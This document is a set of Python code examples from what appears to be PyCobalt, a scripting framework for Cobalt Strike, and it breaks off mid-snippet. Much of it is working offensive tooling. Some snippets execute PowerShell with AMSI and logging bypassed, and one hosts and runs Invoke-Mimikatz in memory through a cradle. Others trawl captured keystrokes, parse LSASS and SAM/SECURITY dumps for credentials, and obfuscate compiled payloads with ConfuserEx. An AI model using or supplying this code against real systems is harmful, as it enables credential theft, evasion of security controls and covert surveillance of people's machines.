Example #1
def _(*args):
    parser = helpers.ArgumentParser(
        prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        return

    finds = 0
    for frame in aggressor.data_query('beaconlog'):
        output_type = frame[0]
        bid = frame[1]
        if output_type == 'beacon_input':
            user = frame[2]
            data = frame[3]
            time = convert_time(frame[4])
        else:
            data = frame[2]
            time = convert_time(frame[3])

        user = aggressor.beacon_info(bid, 'user')
        computer = aggressor.beacon_info(bid, 'computer')

        if user == args.user or computer == args.computer:
            # it's a match!
            finds += 1

            # write the match to the output file (positional 'out' argument)
            with open(args.out, 'a+') as fp:
                fp.write(data)

    engine.message('Wrote {} finds to {}'.format(finds, args.out))
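In PyCobalt scripts, anonymous callbacks like the one above are typically registered as script console commands and the engine loop is started at the end of the script. A minimal, hypothetical registration sketch based on PyCobalt's documented decorator API (the command name and message are illustrative assumptions):

import pycobalt.engine as engine
import pycobalt.commands as commands

# hypothetical wiring: register a callback like the one above as the 'logs' command
@commands.command('logs')
def _(*args):
    engine.message('logs invoked with: {}'.format(' '.join(args)))

# hand control to PyCobalt so registered commands receive their callbacks
engine.loop()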
Example #2
def prune_dead():
    for beacon in aggressor.beacons():
        if beacon['alive'] == 'false':
            bid = beacon['id']
            engine.message('removing beacon {} ({}@{})'.format(
                bid, beacon['user'], beacon['computer']))
            aggressor.beacon_remove(bid)
Example #3
def custom_powerpick(bid, command, silent=False, auto_host=True):
    # public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
    code = helpers.code_string(r"""
    string powershell = String.Join("\n", args);
    var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
    foreach (string result in results) {
        Console.Write(result);
    }
    """)

    if not silent:
        aggressor.btask(
            bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(
                command.replace('\n', ' ')))

    # include cradle for `powershell-import`/`bpowershell_import`
    cradle = aggressor.beacon_host_imported_script(bid)
    if cradle:
        command = cradle + '\n' + command

    # if the script is too long, host it
    if auto_host and len(command) > max_script_size:
        command = aggressor.beacon_host_script(bid, command)

    engine.message(command)
    references = [
        'mscorlib.dll', 'System.dll', 'System.Core.dll',
        'System.Management.Automation.dll'
    ]
    sharpgen.execute(bid,
                     code, [''] + command.split('\n'),
                     references=references,
                     resources=[],
                     cache=sharpgen_cache)
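A function like custom_powerpick() would normally be exposed to operators as a beacon console alias. A hypothetical sketch using PyCobalt's alias decorator (the alias name and help text are assumptions):

import pycobalt.aliases as aliases

# hypothetical wiring: expose custom_powerpick as a beacon console alias
@aliases.alias('custom-powerpick', 'Run PowerShell through a SharpGen-compiled runner')
def _(bid, *command):
    custom_powerpick(bid, ' '.join(command))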
Example #4
def _(source, out, *args):
    engine.message('Compiling C# code from: {}'.format(source))
    try:
        sharpgen.compile_file(source, out=out, additional_options=args)
        engine.message('All finished! Output is in: {}'.format(out))
    except RuntimeError as e:
        engine.error('SharpGen failed. See above for more details')
Example #5
    def read(self, n=-1):
        #engine.message('read %s' % n)
        if n == 0:
            return b''

        if n != -1:
            for section in self.cache:
                if section.inrange(self.curpos, n):
                    #engine.message(n)
                    data = section.read(self.curpos, n)
                    #engine.message(data)
                    self.seek(n, 1)
                    return data

        # The requested data was not found in the cache, so read a larger
        # chunk than requested and keep it in memory. Reading more data
        # advances the current position, so reset it afterwards with seek().

        readsize = min(self.maxreadsize, n)
        readsize = max(self.minreadsize, readsize)
        buffer = b''

        engine.message('READ offset %s' % self.curpos)
        engine.message('READ N %s' % n)

        # needed because the read size may be smaller than the requested amount
        for _ in range(int(math.ceil(n / readsize))):
            data = self.__bacon_read(readsize, self.curpos + len(buffer))
            buffer += data

        section = FileSection(self.curpos, buffer)
        self.cache.append(section)

        data = section.read(self.curpos, n)
        self.seek(self.curpos + n, 0)
        return data
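The caching logic above leans on a FileSection helper that remembers a chunk of remote file data together with its starting offset. The real class isn't shown here; a minimal sketch consistent with how it is used (inrange() and read()) might look like this:

class FileSection:
    """Sketch of the assumed cache entry: one chunk of the remote file."""

    def __init__(self, startpos, data):
        self.startpos = startpos
        self.data = data
        self.endpos = startpos + len(data)

    def inrange(self, pos, n):
        # True if the requested range [pos, pos + n) lies entirely inside this chunk
        return pos >= self.startpos and pos + n <= self.endpos

    def read(self, pos, n):
        # return n bytes starting at absolute file offset pos
        start = pos - self.startpos
        return self.data[start:start + n]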
Example #6
def _(mode):
    if mode == 'on':
        engine.message('Enabled custom powerpick')
        enable_custom_powerpick()
    elif mode == 'off':
        engine.message('Disabled custom powerpick')
        disable_custom_powerpick()
    else:
        engine.error('Usage: custom-powerpick on|off')
Example #7
def _(mode):
    if mode == 'on':
        sharpgen.set_confuser_protections(config.protections_net35)
        engine.message('Enabled SharpGen ConfuserEx protections')
    elif mode == 'off':
        sharpgen.set_confuser_protections(None)
        engine.message('Disabled SharpGen ConfuserEx protections')
    else:
        engine.error('Usage: sharpgen-confuser on|off')
Example #8
def _(mode):
    if mode == 'on':
        sharpgen.enable_cache_overwrite()
        engine.message('Enabled SharpGen cache overwrite')
    elif mode == 'off':
        sharpgen.disable_cache_overwrite()
        engine.message('Disabled SharpGen cache overwrite')
    else:
        engine.error('Usage: sharpgen-cache-overwrite on|off')
Example #9
def dialog_callback_lsass(dialog, button_name, values_dict):
    engine.message('dialog_callback_lsass invoked!')
    engine.message('button_name %s' % button_name)
    engine.message('values_dict %s' % str(values_dict))

    chunksize = int(values_dict['chunksize']) * 1024
    filepath = values_dict['filepath']
    boffilepath = values_dict['boffilepath']
    bid = values_dict['bid']
    packages = []
    outputs = []

    try:
        with open(boffilepath, 'rb') as f:
            f.read(100)
    except Exception as e:
        aggressor.show_error(
            "Can't open BOF file! Did you get the path correct? Reason: %s" %
            e)
        return

    for pkg in [
            'all', 'msv', 'wdigest', 'kerberos', 'ktickets', 'ssp', 'livessp',
            'tspkg', 'cloudap'
    ]:
        if pkg in values_dict and values_dict[pkg] == 'true':
            packages.append(pkg)

    if len(packages) == 0:
        aggressor.show_error(
            "No packages were defined! LSASS parsing will not start!")
        return

    for output in ['json', 'text', 'grep']:
        if output in values_dict and values_dict[output] == 'true':
            outputs.append(output)

    if len(outputs) == 0:
        aggressor.show_error(
            "No output format(s) selected! LSASS parsing will not start!")
        return

    to_delete = values_dict['delete'] == 'true'
    add_creds = values_dict['credadd'] == 'true'

    engine.message('to_delete %s' % repr(to_delete))
    engine.message('add_creds %s' % repr(add_creds))

    parse_lsass(bid,
                filepath,
                boffilepath,
                chunksize,
                packages=packages,
                outputs=outputs,
                to_delete=to_delete,
                add_creds=add_creds)
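The keys read from values_dict (chunksize, filepath, boffilepath, bid, the package and output checkboxes) have to match the row names of the dialog that invokes this callback. A rough, hypothetical sketch of such a dialog using the Aggressor dialog functions exposed through PyCobalt (row names follow the callback; labels, defaults, and the set of rows shown are illustrative):

def render_dialog_pypykatz_lsass(bid):
    # illustrative defaults; row names must match the keys read in dialog_callback_lsass
    defaults = {
        'bid': bid,
        'chunksize': '64',
        'filepath': '',
        'boffilepath': '',
        'delete': 'false',
        'credadd': 'true',
    }
    dialog = aggressor.dialog('LSASS dump parse', defaults, dialog_callback_lsass)
    aggressor.drow_text(dialog, 'filepath', 'Remote LSASS dump path')
    aggressor.drow_text(dialog, 'boffilepath', 'Local BOF file path')
    aggressor.drow_text(dialog, 'chunksize', 'Chunk size (KB)')
    aggressor.drow_checkbox(dialog, 'all', 'Packages', 'all')
    aggressor.drow_checkbox(dialog, 'json', 'Output', 'json')
    aggressor.dbutton_action(dialog, 'Start')
    aggressor.dialog_show(dialog)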
Example #10
def prune_old(hours):
    for beacon in aggressor.beacons():
        last = int(beacon['last'])

        if older_than(last, hours):
            bid = beacon['id']
            last_hours = last / 1000 / 60 / 60
            engine.message('removing beacon {} ({}@{}) ({} hours old)'.format(
                bid, beacon['user'], beacon['computer'], int(last_hours)))
            aggressor.beacon_remove(bid)
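prune_old() relies on an older_than() helper that isn't shown. Assuming the last field is the number of milliseconds since the beacon last checked in (as the hour conversion above suggests), a plausible sketch is:

def older_than(last_ms, hours):
    # assumed helper: last_ms is milliseconds since the beacon's last check-in
    return last_ms > hours * 60 * 60 * 1000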
Example #11
def _(*args):
    parser = helpers.ArgumentParser(prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try: args = parser.parse_args(args)
    except: return

    finds = get_logs(args.out, user=args.user, computer=args.computer)
    engine.message('Wrote {} log entries to: {}'.format(finds, args.out))
Example #12
def _(bid, command, *args):
    script_file = utils.basedir(
        'powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_file, 'r') as fp:
        script = fp.read()

    # host it
    cmd = aggressor.beacon_host_script(bid, script)
    time.sleep(10)

    # execute in-memory hosted script
    engine.message(cmd)
    aggressor.bpowerpick(
        bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format(
            command, ' '.join(powershell_quote(args))))
Example #13
def _(regex):
    found = False
    engine.message("Searching keystrokes for '{}'".format(regex))
    for frame in aggressor.data_query('keystrokes'):
        data = frame['data']
        bid = frame['bid']
        time = convert_time(frame['when'])
        beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'), aggressor.beacon_info(bid, 'computer'))

        for line in data.splitlines():
            if re.search(regex, line, re.IGNORECASE):
                engine.message("Found keystroke matching '{}' from {} at {}: {}".format(regex, beacon, time, line))
                found = True

    if not found:
        engine.error("Didn't find any keystrokes containing '{}'".format(regex))
Example #14
    def __bacon_read(self, n, offset):
        engine.message('replyid %s' % self.replyid)
        engine.message('offset %s' % offset)
        engine.message('N %s' % n)
        engine.message('bof_path %s' % self.bof_path)
        engine.message('start reading....')
        engine.call('rfs', [
            self.bacon_id, self.bof_path, self.filepath, n, offset,
            self.replyid
        ])

        # don't ask... just don't...
        # callbacks are processed manually here because blocking this thread
        # would stop the entire execution
        for name, message in engine.read_pipe_iter():
            #engine.message('readiter')
            #engine.message(name)
            #engine.message(message)

            if name == 'callback':
                # dispatch callback
                callback_name = message['name']
                callback_args = message['args'] if 'args' in message else []

                if callback_name.startswith('event_beacon_output'):
                    if callback_args[0] == str(self.bacon_id):
                        data = callback_args[1].replace(
                            'received output:\n', '')
                        data = data.replace('\n', '').strip()
                        #engine.message('!data!: %s' % data)
                        if data.startswith('[DATA]'):
                            data = data.split(' ')[1]
                            #print(base64.b64decode(data))
                            return base64.b64decode(data)
                        elif data.startswith('[FAIL]'):
                            raise Exception('File read failed! %s' % data)
            else:
                try:
                    engine.handle_message(name, message)
                except Exception as e:
                    engine.handle_exception_softly(e)
Example #15
def _(*args):
    parser = helpers.ArgumentParser(prog='grep-logs', description='Grep beacon logs for a regex')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-w', '--whole', action='store_true', help='Show whole output')
    parser.add_argument('regex', action='append', help='Search for regex')
    try: args = parser.parse_args(args)
    except: return

    for regex in args.regex:
        finds = 0
        engine.message("Searching beacon logs for '{}'".format(regex))
        for frame in aggressor.data_query('beaconlog'):
            output_type = frame[0]
            bid = frame[1]
            if output_type == 'beacon_input':
                user = frame[2]
                data = frame[3]
                time = convert_time(frame[4])
            else:
                data = frame[2]
                time = convert_time(frame[3])

            for log in split_output(data):
                if re.search(regex, log, re.IGNORECASE):
                    beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'), aggressor.beacon_info(bid, 'computer'))

                    # -w/--whole
                    if args.whole:
                        output = data
                    else:
                        output = log

                    # -o/--out
                    if args.out:
                        with open(args.out, 'a+') as fp:
                            fp.write(output)
                    else:
                        engine.message("Found beacon log matching '{}' from {} at {}:\n{}".format(regex, beacon, time, output))

                    finds += 1

        if finds:
            if args.out:
                engine.message("Wrote {} finds containing '{}' to '{}'".format(finds, regex, args.out))
            else:
                engine.message("Found {} logs containing '{}'".format(finds, regex))
        else:
            engine.error("Didn't find any beacon logs containing '{}'".format(regex))
Example #16
    def ls_callback(bid, directory, content):
        engine.message('callback in: ' + directory)
        files = parse_ls(content)
        for f in files:
            path = r'{}\{}'.format(directory, f['name'])

            if f['type'] == 'D':
                # recurse
                engine.message('recursing: ' + path)
                recurse_ls(bid, path, callback, depth=depth - 1)
            else:
                engine.message('calling for: ' + path)
                callback(path)
Example #17
def _(source, out=None, *sharpgen_flags):
    engine.message('Compiling C# code from: {}'.format(source))
    try:
        out, from_cache = sharpgen.compile_file(
            source, out=out, additional_options=sharpgen_flags, cache=cache)

        if from_cache:
            engine.message(
                'Build was found in the cache! Output is in: {}'.format(out))
        else:
            engine.message(
                'Build was successful! Output is in: {}'.format(out))
    except RuntimeError as e:
        engine.error('SharpGen failed. See above for more details.')
Example #18
def dialog_callback_registry(dialog, button_name, values_dict):
    engine.message('dialog_callback_registry invoked!')
    engine.message('button_name %s' % button_name)
    engine.message('values_dict %s' % str(values_dict))

    chunksize = int(values_dict['chunksize']) * 1024
    system_filepath = values_dict['system_filepath']
    sam_filepath = values_dict['sam_filepath']
    security_filepath = values_dict['security_filepath']
    software_filepath = values_dict['software_filepath']
    boffilepath = values_dict['boffilepath']
    bid = values_dict['bid']
    outputs = []

    try:
        with open(boffilepath, 'rb') as f:
            f.read(100)
    except Exception as e:
        aggressor.show_error(
            "Can't open BOF file! Did you get the path correct? Reason: %s" %
            e)
        return

    for output in ['json', 'text', 'grep']:
        if output in values_dict and values_dict[output] == 'true':
            outputs.append(output)

    if len(outputs) == 0:
        aggressor.show_error(
            "No output format(s) selected! LSASS parsing will not start!")
        return

    parse_registry(bid,
                   boffilepath,
                   system_filepath,
                   sam_filepath=sam_filepath,
                   security_filepath=security_filepath,
                   software_filepath=software_filepath,
                   chunksize=chunksize,
                   outputs=outputs)
Example #19
def compile(
                # Input options
                source,

                # Wrapper options
                use_wrapper=True,
                assembly_name=None,
                class_name=None,
                function_name=None,
                function_type=None,
                using=None,
                add_using=None,

                # Compilation options
                output_kind='console',
                platform='AnyCpu',
                dotnet_framework=None, 
                optimization=True,
                out=None,

                # Confuser options
                confuser_config=None,
                confuser_protections=None,

                # Additional SharpGen options (passed through raw)
                additional_options=None,

                # Resources/references
                resources=None,
                references=None,
                add_resources=None,
                add_references=None,

                # Cache options
                cache=None,
                cache_overwrite=None,
                no_cache_write=False,

                # Dependency info
                sharpgen_location=None,
                sharpgen_runner=None
           ):
    """
    Compile some C# code using SharpGen.

    :param source: Source to compile

    :param use_wrapper: Use a class and function Main code wrapper (default: True)
    :param class_name: Name of generated class (default: random)
    :param function_name: Name of function for wrapper (default: Main for .exe, Execute for .dll)
    :param function_type: Function return type (default: void for .exe, object for .dll)
    :param using: Namespaces to use (C# `using`) in the wrapper. See
                  `sharpgen.set_using()` for more information.
    :param add_using: Additional namespaces to use (C# `using`) in the wrapper.
                      These are added on top of the defaults. See
                      `sharpgen.set_using()` for more information.

    :param assembly_name: Name of generated assembly (default: random)
    :param output_kind: Type of output (exe/console or dll/library) (default: console)
    :param platform: Platform to compile for (any/AnyCpu, x86, or x64) (default: AnyCpu)
    :param confuser_config: ConfuserEx configuration file. Set a default for this
                            option with `set_confuser_config(<file>)`.
    :param confuser_protections: ConfuserEx protections to enable. Setting this
                                 argument will generate a temporary ConfuserEx
                                 config file for this build. For more
                                 information and to set a default for this
                                 option see `set_confuser_protections(<protections>)`.
    :param dotnet_framework: .NET Framework version to compile against
                             (net35 or net40) (default: value passed to
                             `set_dotnet_framework(<version>)` or net35)
    :param optimization: Perform code optimization (default: True)
    :param out: Output file (default: file in /tmp)

    :param additional_options: List of additional SharpGen options/flags
                               (passed through raw)

    :param resources: List of resources to whitelist (by Name). This option
                      temporarily modifies your `resources.yml` file so listed
                      resources must be present in that file. By default
                      resources.yml will not be touched. Call
                      `set_resources(<resources>)` to change the default.
    :param references: List of references to whitelist (by File). This option
                      temporarily modifies your `references.yml` file so listed
                      references must be present in that file. By default
                       references.yml will not be touched. Call
                      `set_references(<references>)` to change the default.
    :param add_resources: List of resources to add, on top of the defaults (see
                          `set_resources(<resources>)`)
    :param add_references: List of references to add, on top of the defaults
                           (see `set_references(<references>)`)

    :param cache: Use the build cache. Not setting this option will use the
                  global settings (`enable_cache()`/`disable_cache()`). By
                  default the build cache is off.
    :param cache_overwrite: Force overwriting this build in the cache (disable
                            cache retrieval but not writing). The default is
                            `False` unless `enable_cache_overwrite()` is called.
    :param no_cache_write: Allow for cache retrieval but not cache writing

    :param sharpgen_location: Location of SharpGen directory (default: location
                              passed to `set_location()` or PyCobalt repo copy)
    :param sharpgen_runner: Program used to run the SharpGen dll (default:
                            sharpgen.default_runner or 'dotnet')

    :return: Tuple containing (out, cached) where `out` is the name of the
             output file and `cached` is a boolean containing True if the build
             is from the build cache
    :raises RuntimeError: If one of the options is invalid
    """

    # check output_kind
    if output_kind not in ('exe', 'console', 'dll', 'library'):
        raise RuntimeError('Argument output_kind must be exe/console or dll/library')
    if output_kind == 'exe':
        output_kind = 'console'
    if output_kind == 'library':
        output_kind = 'dll'

    # check dotnet_framework
    if not dotnet_framework:
        global _default_dotnet_framework
        dotnet_framework = _default_dotnet_framework
    if dotnet_framework not in ('net35', 'net40'):
        raise RuntimeError('Argument dotnet_framework must be net35 or net40')

    if not out:
        # use a temporary output file
        if output_kind == 'dll':
            suffix = '_build.dll'
        else:
            suffix = '_build.exe'
        out = tempfile.NamedTemporaryFile(prefix='pycobalt.sharpgen.', suffix=suffix, delete=False).name

    # cache settings
    # set default cache_overwrite
    global _default_cache_overwrite
    if cache_overwrite is None:
        cache_overwrite = _default_cache_overwrite

    # determine cache write and retrieval settings based on `cache`,
    # `cache_overwrite`, and `no_cache_write`
    global _default_cache_enabled
    if cache is None:
        # use global settings
        cache_write = _default_cache_enabled and not no_cache_write
        cache_retrieval = _default_cache_enabled and not cache_overwrite
    else:
        # override global settings
        cache_write = cache and not no_cache_write
        cache_retrieval = cache and not cache_overwrite

    if cache_retrieval or cache_write:
        # get cache source hash
        source_hash = cache_source_hash(source)

    if cache_retrieval:
        # try to retrieve build from cache
        if cache_retrieve(source_hash, out):
            # successfully retrieved file from the cache
            engine.debug('Retrieved {} from the SharpGen cache'.format(source_hash))
            return out, True

    # default sharpgen_location
    if not sharpgen_location:
        global _sharpgen_location
        sharpgen_location = _sharpgen_location

    # find SharpGen.dll
    sharpgen_dll = _find_sharpgen_dll(sharpgen_location)

    # wrapper options
    if use_wrapper:
        if not function_name:
            if output_kind == 'dll':
                function_name = 'Execute'
            else:
                function_name = 'Main'

        if not function_type:
            if output_kind == 'dll':
                function_type = 'object'
            else:
                function_type = 'void'

        if not using:
            # default is sharpgen.default_using
            global default_using
            using = default_using

        if add_using:
            # build a new list so the global default_using isn't mutated in place
            using = using + add_using

        # de-duplicate using
        using = list(set(using))

        source = wrap_code(source, function_name=function_name,
                           function_type=function_type, class_name=class_name,
                           using=using)

    # check platform
    platform = platform.lower()
    if platform not in ('any', 'anycpu', 'x86', 'x64'):
        raise RuntimeError('Argument platform must be any/AnyCpu, x86, or x64')
    if platform in ('any', 'anycpu'):
        platform = 'AnyCpu'

    args = []

    # compiler options
    args += ['--dotnet-framework', dotnet_framework,
             '--output-kind', output_kind,
             '--platform', platform]

    if not optimization:
        args.append('--no-optimization')

    if assembly_name:
        args += ['--assembly-name', assembly_name]

    # ConfuserEx config
    # if neither flag is passed, pick a global default
    if not (confuser_config or confuser_protections):
        global _default_confuser_config
        global _default_confuser_protections

        # prefer `set_confuser_config()` over `set_confuser_protections()`
        if _default_confuser_config:
            confuser_config = _default_confuser_config
        elif _default_confuser_protections:
            confuser_protections = _default_confuser_protections

    # check to make sure both arguments were not passed
    if confuser_protections and confuser_config:
        raise RuntimeError('Arguments confuser_protections and confuser_config are not compatible together')

    # if confuser_protections is passed generate a ConfuserEx config file
    confuser_tempfile = None
    if confuser_protections:
        # this is cleaned up way at the bottom of the function
        confuser_tempfile = tempfile.NamedTemporaryFile('w+',
                prefix='pycobalt.sharpgen.', suffix='_confuser_config.cr')

        config = generate_confuser_config(confuser_protections)

        engine.debug('Confuser config: ' + config)

        confuser_tempfile.write(config)
        confuser_tempfile.flush()

        confuser_config = confuser_tempfile.name

    if confuser_config:
        args += ['--confuse', confuser_config]

    # additional options
    if additional_options:
        args += additional_options

    def filter_yaml(yaml, key, enabled_items):
        """
        Filter references.yml or resources.yml

        :param yaml: Original yaml
        :param key: Key to filter on
        :param enabled_items: Values to filter on
        :return: Filtered yaml
        """

        # parse content
        items = utils.yaml_basic_load(yaml)

        # filter out the items we want
        for item in items:
            if item[key].lower() in [item.lower() for item in enabled_items]:
                item['Enabled'] = 'true'
            else:
                item['Enabled'] = 'false'

        # dump new yaml
        return utils.yaml_basic_dump(items)

    resources_yaml_file = '{}/Resources/resources.yml'.format(sharpgen_location)
    references_yaml_file = '{}/References/references.yml'.format(sharpgen_location)

    original_resources_yaml = None
    original_references_yaml = None

    # figure out resources behavior
    global default_resources
    if resources is None:
        resources = default_resources

    if add_resources:
        if resources in (None, no_changes):
            resources = add_resources
        else:
            # build a new list so the caller's list / global default isn't mutated
            resources = resources + add_resources

    # de-duplicate resources
    if resources is not no_changes:
        resources = list(set(resources))

    # figure out references behavior
    global default_references
    if references is None:
        references = default_references

    if add_references:
        if references in (None, no_changes):
            references = add_references
        else:
            # build a new list so the caller's list / global default isn't mutated
            references = references + add_references

    # de-duplicate references
    if references is not no_changes:
        references = list(set(references))

    # this feels a bit ugly but I can't think of a better way to do it
    try:
        # pick resources?
        if resources is not no_changes:
            # read in original yaml
            with open(resources_yaml_file, 'r') as fp:
                original_resources_yaml = fp.read()

            # filter yaml
            new_yaml = filter_yaml(original_resources_yaml, 'Name', resources)

            engine.debug('Temporarily overwriting {} with:\n{}'.format(resources_yaml_file, new_yaml))

            # overwrite yaml file with new yaml
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(new_yaml)

        # pick references?
        if references is not no_changes:
            # read in original yaml
            with open(references_yaml_file, 'r') as fp:
                original_references_yaml = fp.read()

            # filter yaml
            new_yaml = filter_yaml(original_references_yaml, 'File', references)

            engine.debug('Temporarily overwriting {} with:\n{}'.format(references_yaml_file, new_yaml))

            # overwrite yaml file with new yaml
            with open(references_yaml_file, 'w+') as fp:
                fp.write(new_yaml)

        # write source to a file and build it
        with tempfile.NamedTemporaryFile('w+', prefix='pycobalt.sharpgen.', suffix='_code.cs') as source_file:
            source_file.write(source)
            source_file.flush()

            # in and out
            args += ['--file', out,
                     '--source-file', source_file.name]

            if not sharpgen_runner:
                # default sharpgen_runner is default_runner ('dotnet' by
                # default)
                global default_runner
                sharpgen_runner = default_runner

            # call the SharpGen dll
            args = [sharpgen_runner, sharpgen_dll] + args
            #engine.debug('Compiling code: ' + source)
            #engine.debug('Running SharpGen: {}'.format(' '.join(args)))

            code, output, _ = helpers.capture(args, merge_stderr=True)
            output = output.decode()

            #engine.debug('Finished running SharpGen')

        if code != 0 or not os.path.isfile(out) or not os.path.getsize(out):
            # SharpGen failed
            engine.message('SharpGen invocation: {}'.format(' '.join(args)))
            engine.message('SharpGen error code: {}'.format(code))
            engine.message('SharpGen error output:\n' + output)
            engine.message('End SharpGen error output')

            if os.path.isfile(out):
                os.remove(out)

            raise RuntimeError('SharpGen failed with code {}'.format(code))
        else:
            engine.debug('SharpGen return: {}'.format(code))
            engine.debug('SharpGen output: {}'.format(output))
    finally:
        if original_resources_yaml:
            # set the resources yaml back to the original
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(original_resources_yaml)

        if original_references_yaml:
            # set the references yaml back to the original
            with open(references_yaml_file, 'w+') as fp:
                fp.write(original_references_yaml)

    if cache_write and os.path.isfile(out):
        # copy build to the cache
        engine.debug('Adding {} to SharpGen cache'.format(source_hash))
        _cache_add(source_hash, out)

    if confuser_tempfile:
        # we have to explicitly close the tempfile here. otherwise python's
        # garbage collector might "optimize" out the object early, causing the
        # file to be deleted.
        confuser_tempfile.close()

    return out, False
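A short usage sketch for compile() (the C# snippet and option values are illustrative, not taken from the original scripts):

# build a small x64 console binary against .NET 3.5 and use the build cache
out, cached = compile(
    r'Console.WriteLine("hello from SharpGen");',
    output_kind='exe',
    platform='x64',
    dotnet_framework='net35',
    cache=True)

engine.message('Built {} (from cache: {})'.format(out, cached))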
Example #20
def compile_file(
                    # Input options
                    source,

                    # SharpGen options
                    dotnet_framework='net35', output_kind='console', platform='x86',
                    no_optimization=False, assembly_name=None, class_name=None,
                    confuse=None, out=None,

                    # Additional SharpGen options (passed through raw)
                    additional_options=None,

                    # Resources/references
                    resources=None,
                    references=None,

                    # Dependency info
                    sharpgen_location=None
                ):
    """
    Compile a file using SharpGen.

    :param source: File name to compile
    :param dotnet_framework: .NET version to compile against (net35 or net40) (SharpGen's --dotnet-framework)
    :param output_kind: Type of output (console or dll) (SharpGen's --output-kind)
    :param platform: Platform to compile for (AnyCpu, x86, or x64) (SharpGen's --platform)
    :param no_optimization: Do not perform code optimization (SharpGen's --no-optimization)
    :param assembly_name: Name of generated assembly (SharpGen's --assembly-name)
    :param class_name: Name of generated class (SharpGen's --class-name)
    :param confuse: ConfuserEx configuration file (SharpGen's --confuse)
    :param out: Output file (SharpGen's --file)
    :param additional_options: List of additional SharpGen options/flags
                               (passed through raw)
    :param resources: List of resources to include (by Name). These must be
                      present in your resources.yml file.
    :param references: List of references to include (by File). These must be
                       present in your references.yml file.
    :param sharpgen_location: Location of SharpGen directory (default: location
                              passed to `set_location()` or repo copy)
    :return: Name of output file
    :raises RuntimeError: If one of the options is invalid
    """

    global _sharpgen_location

    # default sharpgen_location
    if not sharpgen_location:
        sharpgen_location = _sharpgen_location

    sharpgen_dll = _find_sharpgen_dll(sharpgen_location)

    # python 3.5 typing is still too new so I do this instead
    # check dotnet_framework
    if dotnet_framework not in ['net35', 'net40']:
        raise RuntimeError('compile_file: dotnet_framework must be net35 or net40')

    # check output_kind
    if output_kind not in ['console', 'dll']:
        raise RuntimeError('compile_file: output_kind must be console or dll')

    # check platform
    if platform not in ['AnyCpu', 'x86', 'x64']:
        raise RuntimeError('compile_file: platform must be AnyCpu, x86, or x64')

    args = ['dotnet', sharpgen_dll,
            '--dotnet-framework', dotnet_framework,
            '--output-kind', output_kind,
            '--platform', platform]

    # other options
    if no_optimization:
        args.append('--no-optimization')

    if assembly_name:
        args += ['--assembly-name', assembly_name]

    if class_name:
        args += ['--class-name', class_name]

    if confuse:
        args += ['--confuse', confuse]

    if additional_options:
        args += additional_options

    resources_yaml_overwritten = False
    references_yaml_overwritten = False

    # this is a bit ugly but I can't think of a better way to do it
    try:
        if resources is not None:
            # pick resources
            resources_yaml_file = '{}/Resources/resources.yml'.format(sharpgen_location)

            # read in original yaml
            with open(resources_yaml_file, 'r') as fp:
                original_resources_yaml = fp.read()

            # and parse it
            items = utils.yaml_basic_load(original_resources_yaml)

            # filter out the items we want
            for item in items:
                if item['Name'] in resources:
                    item['Enabled'] = 'true'
                else:
                    item['Enabled'] = 'false'

            # overwrite yaml file with new yaml
            with open(resources_yaml_file, 'w+') as fp:
                new_yaml = utils.yaml_basic_dump(items)
                fp.write(new_yaml)

            resources_yaml_overwritten = True

        if references is not None:
            # pick references
            references_yaml_file = '{}/References/references.yml'.format(sharpgen_location)

            # read in original yaml
            with open(references_yaml_file, 'r') as fp:
                original_references_yaml = fp.read()

            # and parse it
            items = utils.yaml_basic_load(original_references_yaml)

            # filter out the items we want
            for item in items:
                if item['File'] in references:
                    item['Enabled'] = 'true'
                else:
                    item['Enabled'] = 'false'

            # overwrite yaml file with new yaml
            with open(references_yaml_file, 'w+') as fp:
                new_yaml = utils.yaml_basic_dump(items)
                fp.write(new_yaml)

            references_yaml_overwritten = True

        if not out:
            # use a temporary file
            if output_kind == 'dll':
                suffix = '.dll'
            else:
                suffix = '.exe'
            out = tempfile.NamedTemporaryFile(prefix='pycobalt.sharpgen.', suffix=suffix, delete=False).name

        args += ['--file', out,
                 '--source-file', source]

        engine.debug('running SharpGen: ' + ' '.join(args)) 
        code, output, _ = helpers.capture(args, merge_stderr=True)
        output = output.decode()
        engine.debug('SharpGen return: {}'.format(code))
        engine.debug('SharpGen output: {}'.format(output))

        if code != 0:
            # SharpGen failed
            engine.message('SharpGen invocation: {}'.format(' '.join(args)))
            engine.message('SharpGen error code: {}'.format(code))
            engine.message('SharpGen error output:\n' + output)
            engine.message('End SharpGen error output')
            raise RuntimeError('SharpGen failed with code {}'.format(code))
    finally:
        if resources_yaml_overwritten:
            # set the resources yaml back to the original
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(original_resources_yaml)

        if references_yaml_overwritten:
            # set the references yaml back to the original
            with open(references_yaml_file, 'w+') as fp:
                fp.write(original_references_yaml)

    return out
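A short usage sketch for compile_file() (the source path and reference list are illustrative; listed references must already exist in references.yml):

# compile an existing .cs file into a temporary .exe, whitelisting one reference
out = compile_file(
    '/path/to/Example.cs',          # illustrative path
    dotnet_framework='net40',
    output_kind='console',
    references=['mscorlib.dll'])

engine.message('Output written to: ' + out)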
Example #21
def _():
    sharpgen.clear_cache()
    engine.message('Cleared the SharpGen build cache')
Example #22
def suicide_callback(bids, b=None, c=None):
    engine.message('bc')
    engine.message(b)
    engine.message(c)
    for bid in bids:
        cleanup.suicide(bid)
Example #23
menu = gui.popup('beacon_top',
                 callback=beacon_top_callback,
                 children=[
                     gui.menu('pypyKatz',
                              children=[
                                  gui.insert_menu('pypykatz_top'),
                                  gui.item('LSASS dump parse',
                                           callback=lsass_start_cb),
                                  gui.separator(),
                                  gui.item('REGISTRY dump parse',
